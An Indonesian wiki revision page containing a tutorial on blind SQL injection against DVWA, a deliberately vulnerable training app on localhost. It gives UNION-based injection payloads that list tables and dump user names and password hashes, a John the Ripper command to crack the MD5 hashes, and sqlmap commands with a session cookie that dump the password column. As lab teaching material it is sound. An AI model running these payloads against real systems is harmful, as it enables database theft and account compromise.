Difference between revisions of "DVWA: SQLi blind"
Jump to navigation
Jump to search
Onnowpurbo (talk | contribs) |
Onnowpurbo (talk | contribs) |
||
| Line 1: | Line 1: | ||
DVWA-BLIND SQL INJECTION : LOW Level | DVWA-BLIND SQL INJECTION : LOW Level | ||
| − | + | * Buka DVWA, misalnya http://localhost/DVWA-1.9 | |
Username : Admin | Username : Admin | ||
Password : Password | Password : Password | ||
| − | + | * Pilih SQL Injection BLIND dan dalam kolom ID masukan | |
1' and 1=1# | 1' and 1=1# | ||
1' and 1=1 order by 2 # | 1' and 1=1 order by 2 # | ||
| + | ID: 'or' 1=1-- | ||
| − | 5 | + | Kita akan lihat ada 5 user |
| − | + | * Melihat informasi table | |
| − | |||
| − | |||
1' and 1=0 union select null,table_name from information_schema.tables# | 1' and 1=0 union select null,table_name from information_schema.tables# | ||
1' and 1=0 union select null,table_name from information_schema.columns where table_name='users'' # | 1' and 1=0 union select null,table_name from information_schema.columns where table_name='users'' # | ||
| − | + | * Melihat informasi table name dari table user | |
1' and 1=0 union select null,concat(table_name,0x0a,column_name) from information_schema.columns where table_name='users'' # | 1' and 1=0 union select null,concat(table_name,0x0a,column_name) from information_schema.columns where table_name='users'' # | ||
| − | + | * Terakhir lihat username dan password | |
1' and 1=0 union select null,concat(first_name,0x0a,password) from users # | 1' and 1=0 union select null,concat(first_name,0x0a,password) from users # | ||
| − | + | * Crack md5 password | |
| − | |||
| − | |||
| − | |||
| + | copy hasil password hash yang diperoleh, save misalnya dengan nama hash | ||
| − | + | Lakukan | |
| + | root@bt:/pentest/passwords/john#./john --format=raw-md5 hash | ||
| − | |||
==Exploit DVWA menggunakan SQLmap== | ==Exploit DVWA menggunakan SQLmap== | ||
Latest revision as of 07:51, 4 March 2017
DVWA-BLIND SQL INJECTION : LOW Level
- Buka DVWA, misalnya http://localhost/DVWA-1.9
Username : Admin Password : Password
- Pilih SQL Injection BLIND dan dalam kolom ID masukan
1' and 1=1# 1' and 1=1 order by 2 # ID: 'or' 1=1--
Kita akan lihat ada 5 user
- Melihat informasi table
1' and 1=0 union select null,table_name from information_schema.tables# 1' and 1=0 union select null,table_name from information_schema.columns where table_name='users #
- Melihat informasi table name dari table user
1' and 1=0 union select null,concat(table_name,0x0a,column_name) from information_schema.columns where table_name='users #
- Terakhir lihat username dan password
1' and 1=0 union select null,concat(first_name,0x0a,password) from users #
- Crack md5 password
copy hasil password hash yang diperoleh, save misalnya dengan nama hash
Lakukan
root@bt:/pentest/passwords/john#./john --format=raw-md5 hash
Exploit DVWA menggunakan SQLmap
- Login ke DVWA
- Pilih DVWA Security Low
- Pada user ID tulis '1
- Jalankan addon tamer di browser
- Lakukan di terminal,
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -T users --columns
--> "security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="
di peroleh dari addon tamer di browser.
- lihat tables
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -D dvwa --tables
- lihat kolom di user tabel
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -T users --columns
- lihat field password & dump
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -C password --dump